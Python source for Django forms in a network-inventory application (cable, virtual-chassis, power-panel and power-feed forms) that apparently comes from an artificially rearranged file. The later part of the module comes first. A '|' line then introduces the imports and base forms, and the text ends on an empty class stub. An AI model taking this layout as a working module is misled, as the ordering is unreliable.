    """Connect a cable's B side to a RearPort on the selected device."""
    termination_b_id = DynamicModelChoiceField(
        queryset=RearPort.objects.all(),
        label='Name',
        disabled_indicator='cable',
        query_params={
            'device_id': '$termination_b_device'
        }
    )
class ConnectCableToCircuitTerminationForm(BootstrapMixin, CustomFieldModelForm):
    """Connect a cable's B side to a CircuitTermination (provider -> circuit -> side)."""
    termination_b_provider = DynamicModelChoiceField(
        queryset=Provider.objects.all(),
        label='Provider',
        required=False
    )
    termination_b_region = DynamicModelChoiceField(
        queryset=Region.objects.all(),
        label='Region',
        required=False
    )
    termination_b_site = DynamicModelChoiceField(
        queryset=Site.objects.all(),
        label='Site',
        required=False,
        query_params={
            'region_id': '$termination_b_region'
        }
    )
    termination_b_circuit = DynamicModelChoiceField(
        queryset=Circuit.objects.all(),
        label='Circuit',
        display_field='cid',
        query_params={
            'provider_id': '$termination_b_provider',
            'site_id': '$termination_b_site',
        }
    )
    termination_b_id = DynamicModelChoiceField(
        queryset=CircuitTermination.objects.all(),
        label='Side',
        display_field='term_side',
        disabled_indicator='cable',
        query_params={
            'circuit_id': '$termination_b_circuit'
        }
    )
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )
    class Meta:
        model = Cable
        fields = [
            'termination_b_provider', 'termination_b_region', 'termination_b_site', 'termination_b_circuit',
            'termination_b_id', 'type', 'status', 'label', 'color', 'length', 'length_unit', 'tags',
        ]
    def clean_termination_b_id(self):
        # Return the PK rather than the object
        return getattr(self.cleaned_data['termination_b_id'], 'pk', None)
class ConnectCableToPowerFeedForm(BootstrapMixin, CustomFieldModelForm):
    """Connect a cable's B side to a PowerFeed (site -> rack group -> panel -> feed)."""
    termination_b_region = DynamicModelChoiceField(
        queryset=Region.objects.all(),
        label='Region',
        required=False
    )
    termination_b_site = DynamicModelChoiceField(
        queryset=Site.objects.all(),
        label='Site',
        required=False,
        query_params={
            'region_id': '$termination_b_region'
        }
    )
    termination_b_rackgroup = DynamicModelChoiceField(
        queryset=RackGroup.objects.all(),
        label='Rack Group',
        required=False,
        display_field='cid',
        query_params={
            'site_id': '$termination_b_site'
        }
    )
    termination_b_powerpanel = DynamicModelChoiceField(
        queryset=PowerPanel.objects.all(),
        label='Power Panel',
        required=False,
        query_params={
            'site_id': '$termination_b_site',
            'rack_group_id': '$termination_b_rackgroup',
        }
    )
    termination_b_id = DynamicModelChoiceField(
        queryset=PowerFeed.objects.all(),
        label='Name',
        disabled_indicator='cable',
        query_params={
            'power_panel_id': '$termination_b_powerpanel'
        }
    )
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )
    class Meta:
        model = Cable
        fields = [
            'termination_b_rackgroup', 'termination_b_powerpanel', 'termination_b_id', 'type', 'status', 'label',
            'color', 'length', 'length_unit', 'tags',
        ]
    def clean_termination_b_id(self):
        # Return the PK rather than the object
        return getattr(self.cleaned_data['termination_b_id'], 'pk', None)
class CableForm(BootstrapMixin, CustomFieldModelForm):
    """Edit form for a Cable's own attributes (terminations handled elsewhere)."""
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )
    class Meta:
        model = Cable
        fields = [
            'type', 'status', 'label', 'color', 'length', 'length_unit', 'tags',
        ]
        widgets = {
            'status': StaticSelect2,
            'type': StaticSelect2,
            'length_unit': StaticSelect2,
        }
        error_messages = {
            'length': {
                'max_value': 'Maximum length is 32767 (any unit)'
            }
        }
class CableCSVForm(CustomFieldModelCSVForm):
    """
    CSV import form for Cables. Each row names both terminations
    (device + component type + component name) plus the cable attributes.
    """
    # Termination A
    side_a_device = CSVModelChoiceField(
        queryset=Device.objects.all(),
        to_field_name='name',
        help_text='Side A device'
    )
    side_a_type = CSVContentTypeField(
        queryset=ContentType.objects.all(),
        limit_choices_to=CABLE_TERMINATION_MODELS,
        help_text='Side A type'
    )
    side_a_name = forms.CharField(
        help_text='Side A component name'
    )
    # Termination B
    side_b_device = CSVModelChoiceField(
        queryset=Device.objects.all(),
        to_field_name='name',
        help_text='Side B device'
    )
    side_b_type = CSVContentTypeField(
        queryset=ContentType.objects.all(),
        limit_choices_to=CABLE_TERMINATION_MODELS,
        help_text='Side B type'
    )
    side_b_name = forms.CharField(
        help_text='Side B component name'
    )
    # Cable attributes
    status = CSVChoiceField(
        choices=CableStatusChoices,
        required=False,
        help_text='Connection status'
    )
    type = CSVChoiceField(
        choices=CableTypeChoices,
        required=False,
        help_text='Physical medium classification'
    )
    length_unit = CSVChoiceField(
        choices=CableLengthUnitChoices,
        required=False,
        help_text='Length unit'
    )
    class Meta:
        model = Cable
        fields = [
            'side_a_device', 'side_a_type', 'side_a_name', 'side_b_device', 'side_b_type', 'side_b_name', 'type',
            'status', 'label', 'color', 'length', 'length_unit',
        ]
        help_texts = {
            'color': mark_safe('RGB color in hexadecimal (e.g. <code>00ff00</code>)'),
        }
    def _clean_side(self, side):
        """
        Derive a Cable's A/B termination objects.
        :param side: 'a' or 'b'
        """
        # Internal programming-error guard only (stripped under -O); user input
        # never reaches this assert.
        assert side in 'ab', f"Invalid side designation: {side}"
        device = self.cleaned_data.get(f'side_{side}_device')
        content_type = self.cleaned_data.get(f'side_{side}_type')
        name = self.cleaned_data.get(f'side_{side}_name')
        if not device or not content_type or not name:
            return None
        # Resolve the component model from the ContentType, then the instance by
        # (device, name). Missing component -> validation error for this row.
        model = content_type.model_class()
        try:
            termination_object = model.objects.get(device=device, name=name)
            if termination_object.cable is not None:
                raise forms.ValidationError(f"Side {side.upper()}: {device} {termination_object} is already connected")
        except ObjectDoesNotExist:
            raise forms.ValidationError(f"{side.upper()} side termination not found: {device} {name}")
        # Attach the resolved termination to the in-progress Cable instance.
        setattr(self.instance, f'termination_{side}', termination_object)
        return termination_object
    def clean_side_a_name(self):
        return self._clean_side('a')
    def clean_side_b_name(self):
        return self._clean_side('b')
    def clean_length_unit(self):
        # Avoid trying to save as NULL
        length_unit = self.cleaned_data.get('length_unit', None)
        return length_unit if length_unit is not None else ''
class CableBulkEditForm(BootstrapMixin, AddRemoveTagsForm, CustomFieldBulkEditForm):
    """Bulk edit of selected Cables; enforces that a length always carries a unit."""
    pk = forms.ModelMultipleChoiceField(
        queryset=Cable.objects.all(),
        widget=forms.MultipleHiddenInput
    )
    type = forms.ChoiceField(
        choices=add_blank_choice(CableTypeChoices),
        required=False,
        initial='',
        widget=StaticSelect2()
    )
    status = forms.ChoiceField(
        choices=add_blank_choice(CableStatusChoices),
        required=False,
        widget=StaticSelect2(),
        initial=''
    )
    label = forms.CharField(
        max_length=100,
        required=False
    )
    color = forms.CharField(
        max_length=6,  # RGB color code
        required=False,
        widget=ColorSelect()
    )
    length = forms.IntegerField(
        min_value=1,
        required=False
    )
    length_unit = forms.ChoiceField(
        choices=add_blank_choice(CableLengthUnitChoices),
        required=False,
        initial='',
        widget=StaticSelect2()
    )
    class Meta:
        nullable_fields = [
            'type', 'status', 'label', 'color', 'length',
        ]
    def clean(self):
        super().clean()
        # Validate length/unit
        length = self.cleaned_data.get('length')
        length_unit = self.cleaned_data.get('length_unit')
        if length and not length_unit:
            raise forms.ValidationError({
                'length_unit': "Must specify a unit when setting length"
            })
class CableFilterForm(BootstrapMixin, forms.Form):
    """Filter sidebar form for the Cable list view."""
    model = Cable
    q = forms.CharField(
        required=False,
        label='Search'
    )
    region = DynamicModelMultipleChoiceField(
        queryset=Region.objects.all(),
        to_field_name='slug',
        required=False
    )
    site = DynamicModelMultipleChoiceField(
        queryset=Site.objects.all(),
        to_field_name='slug',
        required=False,
        query_params={
            'region': '$region'
        }
    )
    tenant = DynamicModelMultipleChoiceField(
        queryset=Tenant.objects.all(),
        to_field_name='slug',
        required=False
    )
    rack_id = DynamicModelMultipleChoiceField(
        queryset=Rack.objects.all(),
        required=False,
        label='Rack',
        null_option='None',
        query_params={
            'site': '$site'
        }
    )
    type = forms.MultipleChoiceField(
        choices=add_blank_choice(CableTypeChoices),
        required=False,
        widget=StaticSelect2()
    )
    status = forms.ChoiceField(
        required=False,
        choices=add_blank_choice(CableStatusChoices),
        widget=StaticSelect2()
    )
    color = forms.CharField(
        max_length=6,  # RGB color code
        required=False,
        widget=ColorSelect()
    )
    device_id = DynamicModelMultipleChoiceField(
        queryset=Device.objects.all(),
        required=False,
        label='Device',
        query_params={
            'site': '$site',
            'tenant': '$tenant',
            'rack_id': '$rack_id',
        }
    )
    tag = TagFilterField(model)
#
# Connections
#
class ConsoleConnectionFilterForm(BootstrapMixin, forms.Form):
    """Filter form for the console connections report (region -> site -> device)."""
    region = DynamicModelMultipleChoiceField(
        queryset=Region.objects.all(),
        to_field_name='slug',
        required=False
    )
    site = DynamicModelMultipleChoiceField(
        queryset=Site.objects.all(),
        to_field_name='slug',
        required=False,
        query_params={
            'region': '$region'
        }
    )
    device_id = DynamicModelMultipleChoiceField(
        queryset=Device.objects.all(),
        required=False,
        label='Device',
        query_params={
            'site': '$site'
        }
    )
class PowerConnectionFilterForm(BootstrapMixin, forms.Form):
    """Filter form for the power connections report (region -> site -> device)."""
    region = DynamicModelMultipleChoiceField(
        queryset=Region.objects.all(),
        to_field_name='slug',
        required=False
    )
    site = DynamicModelMultipleChoiceField(
        queryset=Site.objects.all(),
        to_field_name='slug',
        required=False,
        query_params={
            'region': '$region'
        }
    )
    device_id = DynamicModelMultipleChoiceField(
        queryset=Device.objects.all(),
        required=False,
        label='Device',
        query_params={
            'site': '$site'
        }
    )
class InterfaceConnectionFilterForm(BootstrapMixin, forms.Form):
    """Filter form for the interface connections report (region -> site -> device)."""
    region = DynamicModelMultipleChoiceField(
        queryset=Region.objects.all(),
        to_field_name='slug',
        required=False
    )
    site = DynamicModelMultipleChoiceField(
        queryset=Site.objects.all(),
        to_field_name='slug',
        required=False,
        query_params={
            'region': '$region'
        }
    )
    device_id = DynamicModelMultipleChoiceField(
        queryset=Device.objects.all(),
        required=False,
        label='Device',
        query_params={
            'site': '$site'
        }
    )
#
# Virtual chassis
#
class DeviceSelectionForm(forms.Form):
    """Carries a hidden multi-select of Devices between virtual-chassis views."""
    pk = forms.ModelMultipleChoiceField(
        queryset=Device.objects.all(),
        widget=forms.MultipleHiddenInput()
    )
class VirtualChassisCreateForm(BootstrapMixin, CustomFieldModelForm):
    """Create a VirtualChassis and assign its initial member devices in one step."""
    region = DynamicModelChoiceField(
        queryset=Region.objects.all(),
        required=False,
        initial_params={
            'sites': '$site'
        }
    )
    site = DynamicModelChoiceField(
        queryset=Site.objects.all(),
        required=False,
        query_params={
            'region_id': '$region'
        }
    )
    rack = DynamicModelChoiceField(
        queryset=Rack.objects.all(),
        required=False,
        null_option='None',
        display_field='display_name',
        query_params={
            'site_id': '$site'
        }
    )
    members = DynamicModelMultipleChoiceField(
        queryset=Device.objects.all(),
        required=False,
        display_field='display_name',
        query_params={
            'site_id': '$site',
            'rack_id': '$rack',
        }
    )
    initial_position = forms.IntegerField(
        initial=1,
        required=False,
        help_text='Position of the first member device. Increases by one for each additional member.'
    )
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )
    class Meta:
        model = VirtualChassis
        fields = [
            'name', 'domain', 'region', 'site', 'rack', 'members', 'initial_position', 'tags',
        ]
    def save(self, *args, **kwargs):
        instance = super().save(*args, **kwargs)
        # Assign VC members
        if instance.pk:
            # Positions are assigned sequentially starting at initial_position
            # (falling back to 1 when the field is left blank).
            initial_position = self.cleaned_data.get('initial_position') or 1
            for i, member in enumerate(self.cleaned_data['members'], start=initial_position):
                member.virtual_chassis = instance
                member.vc_position = i
                member.save()
        return instance
class VirtualChassisForm(BootstrapMixin, CustomFieldModelForm):
    """Edit form for a VirtualChassis; master choices are limited to its own members."""
    master = forms.ModelChoiceField(
        queryset=Device.objects.all(),
        required=False,
    )
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )
    class Meta:
        model = VirtualChassis
        fields = [
            'name', 'domain', 'master', 'tags',
        ]
        widgets = {
            'master': SelectWithPK(),
        }
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Only devices already belonging to this chassis may be designated master.
        self.fields['master'].queryset = Device.objects.filter(virtual_chassis=self.instance)
class BaseVCMemberFormSet(forms.BaseModelFormSet):
    """Member formset that rejects duplicate vc_position values across its forms."""

    def clean(self):
        super().clean()
        # Record every position seen so far; any form repeating one gets an error.
        seen_positions = []
        for member_form in self.forms:
            position = member_form.cleaned_data.get('vc_position')
            if not position:
                continue
            if position in seen_positions:
                member_form.add_error(
                    'vc_position',
                    'A virtual chassis member already exists in position {}.'.format(position)
                )
            seen_positions.append(position)
class DeviceVCMembershipForm(forms.ModelForm):
    """Edit a Device's position/priority within its VirtualChassis."""
    class Meta:
        model = Device
        fields = [
            'vc_position', 'vc_priority',
        ]
        labels = {
            'vc_position': 'Position',
            'vc_priority': 'Priority',
        }
    def __init__(self, validate_vc_position=False, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Require VC position (only required when the Device is a VirtualChassis member)
        self.fields['vc_position'].required = True
        # Validation of vc_position is optional. This is only required when adding a new member to an existing
        # VirtualChassis. Otherwise, vc_position validation is handled by BaseVCMemberFormSet.
        self.validate_vc_position = validate_vc_position
    def clean_vc_position(self):
        vc_position = self.cleaned_data['vc_position']
        if self.validate_vc_position:
            # Guard against claiming a position already held by another member.
            conflicting_members = Device.objects.filter(
                virtual_chassis=self.instance.virtual_chassis,
                vc_position=vc_position
            )
            if conflicting_members.exists():
                raise forms.ValidationError(
                    'A virtual chassis member already exists in position {}.'.format(vc_position)
                )
        return vc_position
class VCMemberSelectForm(BootstrapMixin, forms.Form):
    """Pick an unassigned Device to add to a VirtualChassis."""
    region = DynamicModelChoiceField(
        queryset=Region.objects.all(),
        required=False,
        initial_params={
            'sites': '$site'
        }
    )
    site = DynamicModelChoiceField(
        queryset=Site.objects.all(),
        required=False,
        query_params={
            'region_id': '$region'
        }
    )
    rack = DynamicModelChoiceField(
        queryset=Rack.objects.all(),
        required=False,
        null_option='None',
        display_field='display_name',
        query_params={
            'site_id': '$site'
        }
    )
    device = DynamicModelChoiceField(
        queryset=Device.objects.all(),
        display_field='display_name',
        query_params={
            'site_id': '$site',
            'rack_id': '$rack',
            'virtual_chassis_id': 'null',
        }
    )
    def clean_device(self):
        device = self.cleaned_data['device']
        # Server-side re-check of the 'virtual_chassis_id: null' UI filter.
        if device.virtual_chassis is not None:
            raise forms.ValidationError(
                f"Device {device} is already assigned to a virtual chassis."
            )
        return device
class VirtualChassisBulkEditForm(BootstrapMixin, AddRemoveTagsForm, CustomFieldBulkEditForm):
    """Bulk edit of selected VirtualChassis objects."""
    pk = forms.ModelMultipleChoiceField(
        queryset=VirtualChassis.objects.all(),
        widget=forms.MultipleHiddenInput()
    )
    domain = forms.CharField(
        max_length=30,
        required=False
    )
    class Meta:
        nullable_fields = ['domain']
class VirtualChassisCSVForm(CustomFieldModelCSVForm):
    """CSV import form for VirtualChassis; the master device is matched by name."""
    master = CSVModelChoiceField(
        queryset=Device.objects.all(),
        to_field_name='name',
        required=False,
        help_text='Master device'
    )
    class Meta:
        model = VirtualChassis
        fields = VirtualChassis.csv_headers
class VirtualChassisFilterForm(BootstrapMixin, CustomFieldFilterForm):
    """Filter sidebar form for the VirtualChassis list view."""
    model = VirtualChassis
    q = forms.CharField(
        required=False,
        label='Search'
    )
    region = DynamicModelMultipleChoiceField(
        queryset=Region.objects.all(),
        to_field_name='slug',
        required=False
    )
    site = DynamicModelMultipleChoiceField(
        queryset=Site.objects.all(),
        to_field_name='slug',
        required=False,
        query_params={
            'region': '$region'
        }
    )
    tenant_group = DynamicModelMultipleChoiceField(
        queryset=TenantGroup.objects.all(),
        to_field_name='slug',
        required=False,
        null_option='None'
    )
    tenant = DynamicModelMultipleChoiceField(
        queryset=Tenant.objects.all(),
        to_field_name='slug',
        required=False,
        null_option='None',
        query_params={
            'group': '$tenant_group'
        }
    )
    tag = TagFilterField(model)
#
# Power panels
#
class PowerPanelForm(BootstrapMixin, CustomFieldModelForm):
    """Create/edit form for a PowerPanel (region -> site -> rack group chain)."""
    region = DynamicModelChoiceField(
        queryset=Region.objects.all(),
        required=False,
        initial_params={
            'sites': '$site'
        }
    )
    site = DynamicModelChoiceField(
        queryset=Site.objects.all(),
        query_params={
            'region_id': '$region'
        }
    )
    rack_group = DynamicModelChoiceField(
        queryset=RackGroup.objects.all(),
        required=False,
        query_params={
            'site_id': '$site'
        }
    )
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )
    class Meta:
        model = PowerPanel
        fields = [
            'region', 'site', 'rack_group', 'name', 'tags',
        ]
class PowerPanelCSVForm(CustomFieldModelCSVForm):
    """CSV import form for PowerPanel; rack_group choices are limited to the given site."""
    site = CSVModelChoiceField(
        queryset=Site.objects.all(),
        to_field_name='name',
        help_text='Name of parent site'
    )
    rack_group = CSVModelChoiceField(
        queryset=RackGroup.objects.all(),
        required=False,
        to_field_name='name'
    )

    class Meta:
        model = PowerPanel
        fields = PowerPanel.csv_headers

    def __init__(self, data=None, *args, **kwargs):
        super().__init__(data, *args, **kwargs)

        if data:
            # Limit group queryset by assigned site.
            # Bug fix: the inner subscript quotes must differ from the f-string's
            # own quotes; same-quote nesting is a SyntaxError before Python 3.12.
            params = {f"site__{self.fields['site'].to_field_name}": data.get('site')}
            self.fields['rack_group'].queryset = self.fields['rack_group'].queryset.filter(**params)
class PowerPanelBulkEditForm(BootstrapMixin, AddRemoveTagsForm, CustomFieldBulkEditForm):
    """Bulk edit of selected PowerPanels."""
    pk = forms.ModelMultipleChoiceField(
        queryset=PowerPanel.objects.all(),
        widget=forms.MultipleHiddenInput
    )
    region = DynamicModelChoiceField(
        queryset=Region.objects.all(),
        required=False,
        initial_params={
            'sites': '$site'
        }
    )
    site = DynamicModelChoiceField(
        queryset=Site.objects.all(),
        required=False,
        query_params={
            'region_id': '$region'
        }
    )
    rack_group = DynamicModelChoiceField(
        queryset=RackGroup.objects.all(),
        required=False,
        query_params={
            'site_id': '$site'
        }
    )
    class Meta:
        nullable_fields = ['rack_group']
class PowerPanelFilterForm(BootstrapMixin, CustomFieldFilterForm):
    """Filter sidebar form for the PowerPanel list view."""
    model = PowerPanel
    q = forms.CharField(
        required=False,
        label='Search'
    )
    region = DynamicModelMultipleChoiceField(
        queryset=Region.objects.all(),
        to_field_name='slug',
        required=False
    )
    site = DynamicModelMultipleChoiceField(
        queryset=Site.objects.all(),
        to_field_name='slug',
        required=False,
        query_params={
            'region': '$region'
        }
    )
    rack_group_id = DynamicModelMultipleChoiceField(
        queryset=RackGroup.objects.all(),
        required=False,
        label='Rack group (ID)',
        null_option='None',
        query_params={
            'site': '$site'
        }
    )
    tag = TagFilterField(model)
#
# Power feeds
#
class PowerFeedForm(BootstrapMixin, CustomFieldModelForm):
    """Create/edit form for a PowerFeed; site/region pre-populate from the panel."""
    region = DynamicModelChoiceField(
        queryset=Region.objects.all(),
        required=False,
        initial_params={
            'sites__powerpanel': '$power_panel'
        }
    )
    site = DynamicModelChoiceField(
        queryset=Site.objects.all(),
        required=False,
        initial_params={
            'powerpanel': '$power_panel'
        },
        query_params={
            'region_id': '$region'
        }
    )
    power_panel = DynamicModelChoiceField(
        queryset=PowerPanel.objects.all(),
        query_params={
            'site_id': '$site'
        }
    )
    rack = DynamicModelChoiceField(
        queryset=Rack.objects.all(),
        required=False,
        display_field='display_name',
        query_params={
            'site_id': '$site'
        }
    )
    comments = CommentField()
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )
    class Meta:
        model = PowerFeed
        fields = [
            'region', 'site', 'power_panel', 'rack', 'name', 'status', 'type', 'supply', 'phase', 'voltage', 'amperage',
            'max_utilization', 'comments', 'tags',
        ]
        widgets = {
            'status': StaticSelect2(),
            'type': StaticSelect2(),
            'supply': StaticSelect2(),
            'phase': StaticSelect2(),
        }
class PowerFeedCSVForm(CustomFieldModelCSVForm):
    """CSV import form for PowerFeed; related querysets are narrowed by the given site."""
    site = CSVModelChoiceField(
        queryset=Site.objects.all(),
        to_field_name='name',
        help_text='Assigned site'
    )
    power_panel = CSVModelChoiceField(
        queryset=PowerPanel.objects.all(),
        to_field_name='name',
        help_text='Upstream power panel'
    )
    rack_group = CSVModelChoiceField(
        queryset=RackGroup.objects.all(),
        to_field_name='name',
        required=False,
        help_text="Rack's group (if any)"
    )
    rack = CSVModelChoiceField(
        queryset=Rack.objects.all(),
        to_field_name='name',
        required=False,
        help_text='Rack'
    )
    status = CSVChoiceField(
        choices=PowerFeedStatusChoices,
        required=False,
        help_text='Operational status'
    )
    type = CSVChoiceField(
        choices=PowerFeedTypeChoices,
        required=False,
        help_text='Primary or redundant'
    )
    supply = CSVChoiceField(
        choices=PowerFeedSupplyChoices,
        required=False,
        help_text='Supply type (AC/DC)'
    )
    phase = CSVChoiceField(
        choices=PowerFeedPhaseChoices,
        required=False,
        help_text='Single or three-phase'
    )

    class Meta:
        model = PowerFeed
        fields = PowerFeed.csv_headers

    def __init__(self, data=None, *args, **kwargs):
        super().__init__(data, *args, **kwargs)

        if data:
            # Bug fix throughout this method: the f-strings nested double quotes
            # inside double-quoted f-strings, a SyntaxError before Python 3.12.

            # Limit power_panel queryset by site
            params = {f"site__{self.fields['site'].to_field_name}": data.get('site')}
            self.fields['power_panel'].queryset = self.fields['power_panel'].queryset.filter(**params)

            # Limit rack_group queryset by site
            params = {f"site__{self.fields['site'].to_field_name}": data.get('site')}
            self.fields['rack_group'].queryset = self.fields['rack_group'].queryset.filter(**params)

            # Limit rack queryset by site and group
            params = {
                f"site__{self.fields['site'].to_field_name}": data.get('site'),
                f"group__{self.fields['rack_group'].to_field_name}": data.get('rack_group'),
            }
            self.fields['rack'].queryset = self.fields['rack'].queryset.filter(**params)
class PowerFeedBulkEditForm(BootstrapMixin, AddRemoveTagsForm, CustomFieldBulkEditForm):
    """Bulk edit of selected PowerFeeds."""
    pk = forms.ModelMultipleChoiceField(
        queryset=PowerFeed.objects.all(),
        widget=forms.MultipleHiddenInput
    )
    power_panel = DynamicModelChoiceField(
        queryset=PowerPanel.objects.all(),
        required=False
    )
    rack = DynamicModelChoiceField(
        queryset=Rack.objects.all(),
        required=False,
        display_field='display_name'
    )
    status = forms.ChoiceField(
        choices=add_blank_choice(PowerFeedStatusChoices),
        required=False,
        initial='',
        widget=StaticSelect2()
    )
    type = forms.ChoiceField(
        choices=add_blank_choice(PowerFeedTypeChoices),
        required=False,
        initial='',
        widget=StaticSelect2()
    )
    supply = forms.ChoiceField(
        choices=add_blank_choice(PowerFeedSupplyChoices),
        required=False,
        initial='',
        widget=StaticSelect2()
    )
    phase = forms.ChoiceField(
        choices=add_blank_choice(PowerFeedPhaseChoices),
        required=False,
        initial='',
        widget=StaticSelect2()
    )
    voltage = forms.IntegerField(
        required=False
    )
    amperage = forms.IntegerField(
        required=False
    )
    max_utilization = forms.IntegerField(
        required=False
    )
    comments = CommentField(
        widget=SmallTextarea,
        label='Comments'
    )
    class Meta:
        # NOTE(review): 'rackgroup' does not match any field declared on this form
        # (the nullable rack-related field here is 'rack') -- likely a typo for
        # 'rack'; confirm against BulkEditForm's nullable handling before changing.
        nullable_fields = [
            'rackgroup', 'comments',
        ]
class PowerFeedFilterForm(BootstrapMixin, CustomFieldFilterForm):
    """Filter sidebar form for the PowerFeed list view."""
    model = PowerFeed
    q = forms.CharField(
        required=False,
        label='Search'
    )
    region = DynamicModelMultipleChoiceField(
        queryset=Region.objects.all(),
        to_field_name='slug',
        required=False
    )
    site = DynamicModelMultipleChoiceField(
        queryset=Site.objects.all(),
        to_field_name='slug',
        required=False,
        query_params={
            'region': '$region'
        }
    )
    power_panel_id = DynamicModelMultipleChoiceField(
        queryset=PowerPanel.objects.all(),
        required=False,
        label='Power panel',
        null_option='None',
        query_params={
            'site': '$site'
        }
    )
    rack_id = DynamicModelMultipleChoiceField(
        queryset=Rack.objects.all(),
        required=False,
        label='Rack',
        null_option='None',
        query_params={
            'site': '$site'
        }
    )
    status = forms.MultipleChoiceField(
        choices=PowerFeedStatusChoices,
        required=False,
        widget=StaticSelect2Multiple()
    )
    type = forms.ChoiceField(
        choices=add_blank_choice(PowerFeedTypeChoices),
        required=False,
        widget=StaticSelect2()
    )
    supply = forms.ChoiceField(
        choices=add_blank_choice(PowerFeedSupplyChoices),
        required=False,
        widget=StaticSelect2()
    )
    phase = forms.ChoiceField(
        choices=add_blank_choice(PowerFeedPhaseChoices),
        required=False,
        widget=StaticSelect2()
    )
    voltage = forms.IntegerField(
        required=False
    )
    amperage = forms.IntegerField(
        required=False
    )
    max_utilization = forms.IntegerField(
        required=False
    )
    tag = TagFilterField(model)
| import re
from django import forms
from django.contrib.auth.models import User
from django.contrib.contenttypes.models import ContentType
from django.contrib.postgres.forms.array import SimpleArrayField
from django.core.exceptions import ObjectDoesNotExist
from django.utils.safestring import mark_safe
from netaddr import EUI
from netaddr.core import AddrFormatError
from timezone_field import TimeZoneFormField
from circuits.models import Circuit, CircuitTermination, Provider
from extras.forms import (
AddRemoveTagsForm, CustomFieldBulkEditForm, CustomFieldModelCSVForm, CustomFieldFilterForm, CustomFieldModelForm,
LocalConfigContextFilterForm,
)
from extras.models import Tag
from ipam.constants import BGP_ASN_MAX, BGP_ASN_MIN
from ipam.models import IPAddress, VLAN
from tenancy.forms import TenancyFilterForm, TenancyForm
from tenancy.models import Tenant, TenantGroup
from utilities.forms import (
APISelect, APISelectMultiple, add_blank_choice, BootstrapMixin, BulkEditForm, BulkEditNullBooleanSelect,
ColorSelect, CommentField, CSVChoiceField, CSVContentTypeField, CSVModelChoiceField, CSVModelForm,
DynamicModelChoiceField, DynamicModelMultipleChoiceField, ExpandableNameField, form_from_model, JSONField,
NumericArrayField, SelectWithPK, SmallTextarea, SlugField, StaticSelect2, StaticSelect2Multiple, TagFilterField,
BOOLEAN_WITH_BLANK_CHOICES,
)
from virtualization.models import Cluster, ClusterGroup
from .choices import *
from .constants import *
from .models import (
Cable, DeviceBay, DeviceBayTemplate, ConsolePort, ConsolePortTemplate, ConsoleServerPort, ConsoleServerPortTemplate,
Device, DeviceRole, DeviceType, FrontPort, FrontPortTemplate, Interface, InterfaceTemplate, Manufacturer,
InventoryItem, Platform, PowerFeed, PowerOutlet, PowerOutletTemplate, PowerPanel, PowerPort, PowerPortTemplate,
Rack, RackGroup, RackReservation, RackRole, RearPort, RearPortTemplate, Region, Site, VirtualChassis,
)
# Matches a device reference given as a primary-key token of the form "{123}".
DEVICE_BY_PK_RE = r'{\d+\}'
# HTML help text shown for interface 802.1Q mode selection.
INTERFACE_MODE_HELP_TEXT = """
Access: One untagged VLAN<br />
Tagged: One untagged VLAN and/or one or more tagged VLANs<br />
Tagged (All): Implies all VLANs are available (w/optional untagged VLAN)
"""
def get_device_by_name_or_pk(name):
    """
    Attempt to retrieve a device by either its name or primary key ('{pk}').
    """
    # A "{<digits>}" token denotes a primary-key lookup; anything else is a name.
    if re.match(DEVICE_BY_PK_RE, name) is not None:
        return Device.objects.get(pk=name.strip('{}'))
    return Device.objects.get(name=name)
class DeviceComponentFilterForm(BootstrapMixin, forms.Form):
    """Base filter form for device-component list views (search + region/site/device)."""
    field_order = [
        'q', 'region', 'site'
    ]
    q = forms.CharField(
        required=False,
        label='Search'
    )
    region = DynamicModelMultipleChoiceField(
        queryset=Region.objects.all(),
        to_field_name='slug',
        required=False
    )
    site = DynamicModelMultipleChoiceField(
        queryset=Site.objects.all(),
        to_field_name='slug',
        required=False,
        query_params={
            'region': '$region'
        }
    )
    device_id = DynamicModelMultipleChoiceField(
        queryset=Device.objects.all(),
        required=False,
        label='Device',
        query_params={
            'site': '$site'
        }
    )
class InterfaceCommonForm(forms.Form):
    """Shared 802.1Q validation for device and VM interface forms."""
    def clean(self):
        super().clean()
        # The parent is either a Device or a VirtualMachine depending on the subclass.
        parent_field = 'device' if 'device' in self.cleaned_data else 'virtual_machine'
        tagged_vlans = self.cleaned_data['tagged_vlans']
        # Untagged interfaces cannot be assigned tagged VLANs
        if self.cleaned_data['mode'] == InterfaceModeChoices.MODE_ACCESS and tagged_vlans:
            raise forms.ValidationError({
                'mode': "An access interface cannot have tagged VLANs assigned."
            })
        # Remove all tagged VLAN assignments from "tagged all" interfaces
        elif self.cleaned_data['mode'] == InterfaceModeChoices.MODE_TAGGED_ALL:
            self.cleaned_data['tagged_vlans'] = []
        # Validate tagged VLANs; must be a global VLAN or in the same site
        elif self.cleaned_data['mode'] == InterfaceModeChoices.MODE_TAGGED:
            valid_sites = [None, self.cleaned_data[parent_field].site]
            invalid_vlans = [str(v) for v in tagged_vlans if v.site not in valid_sites]
            if invalid_vlans:
                raise forms.ValidationError({
                    'tagged_vlans': f"The tagged VLANs ({', '.join(invalid_vlans)}) must belong to the same site as "
                                    f"the interface's parent device/VM, or they must be global"
                })
class ComponentForm(BootstrapMixin, forms.Form):
    """
    Subclass this form when facilitating the creation of one or more device component or component templates based on
    a name pattern.
    """
    name_pattern = ExpandableNameField(
        label='Name'
    )
    label_pattern = ExpandableNameField(
        label='Label',
        required=False,
        help_text='Alphanumeric ranges are supported. (Must match the number of names being created.)'
    )
    def clean(self):
        super().clean()
        # Validate that the number of components being created from both the name_pattern and label_pattern are equal
        if self.cleaned_data['label_pattern']:
            name_pattern_count = len(self.cleaned_data['name_pattern'])
            label_pattern_count = len(self.cleaned_data['label_pattern'])
            if name_pattern_count != label_pattern_count:
                raise forms.ValidationError({
                    'label_pattern': f'The provided name pattern will create {name_pattern_count} components, however '
                                     f'{label_pattern_count} labels will be generated. These counts must match.'
                }, code='label_pattern_mismatch')
#
# Fields
#
class MACAddressField(forms.Field):
